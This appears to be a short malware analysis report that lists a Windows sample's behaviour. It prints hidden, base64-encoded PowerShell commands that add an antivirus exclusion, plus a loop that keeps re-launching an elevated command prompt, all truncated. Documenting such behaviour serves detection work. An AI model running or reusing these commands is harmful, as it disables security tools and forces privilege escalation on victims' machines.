Technical Information
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion:
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoAcgBlAGcAIABhAGQ...
Miscellaneous
Executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "while($true){try{Start-Process 'cmd' -Verb runas -ArgumentList '/k powershell -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGU...
- '%WINDIR%\syswow64\cmd.exe' /k powershell -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoAc...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "while($true){try{Start-Process 'cmd' -Verb runas -ArgumentList '/k powershell -w h -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGU...' (with hidden window)
